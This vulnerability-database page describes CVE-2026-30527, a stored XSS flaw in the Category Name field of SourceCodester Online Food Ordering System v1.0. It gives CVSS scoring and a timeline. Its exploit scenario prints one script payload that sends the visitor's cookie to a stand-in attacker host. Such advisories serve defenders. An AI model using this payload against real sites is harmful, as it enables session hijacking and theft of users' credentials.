What is the CVSS score of CVE-2026-30527?

CVE-2026-30527 has a CVSS 3.1 base score of 5.4 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Is there a public PoC exploit available for CVE-2026-30527?

Yes, a public proof-of-concept exploit is available for CVE-2026-30527. Prioritise patching immediately. EPSS: 0.0%.

Online Food Ordering System CVE-2026-30527

EUVD-2026-16672 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-03-27 cve@mitre.org

XSS Online Food Ordering System

5.4

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

5.4 MEDIUM

AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Required

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

PoC Detected

Apr 06, 2026 - 14:16 vuln.today

Public exploit code

EUVD ID Assigned

Mar 27, 2026 - 16:22 euvd

EUVD-2026-16672

Analysis Generated

Mar 27, 2026 - 16:22 vuln.today

CVE Published

Mar 27, 2026 - 16:16 nvd

MEDIUM 5.4

DescriptionCVE.org

A Stored Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Category management module within the admin panel. The application fails to properly sanitize user input supplied to the "Category Name" field when creating or updating a category. When an administrator or user visits the Category list page (or any page where this category is rendered), the injected JavaScript executes immediately in their browser.

AnalysisAI

Stored XSS in SourceCodester Online Food Ordering System v1.0 allows authenticated administrators to inject malicious JavaScript via the Category Name field in the admin panel, with payloads executing in the browsers of any user viewing the Category list. Publicly available exploit code exists; the vulnerability stems from insufficient input sanitization on a critical administrative function that affects all downstream users who access affected categories.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	Risk assessment is constrained by missing CVSS metrics and EPSS data in the provided intelligence. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An authenticated attacker (or compromised admin account) creates or edits a food category, injecting a malicious JavaScript payload such as <script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script> into the Category Name field. The payload is stored in the database. …
Remediation	Immediate remediation requires upgrading SourceCodester Online Food Ordering System to a patched version released by the vendor; however, no specific patched version number was provided in the available intelligence. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-30527 vulnerability details – vuln.today

Back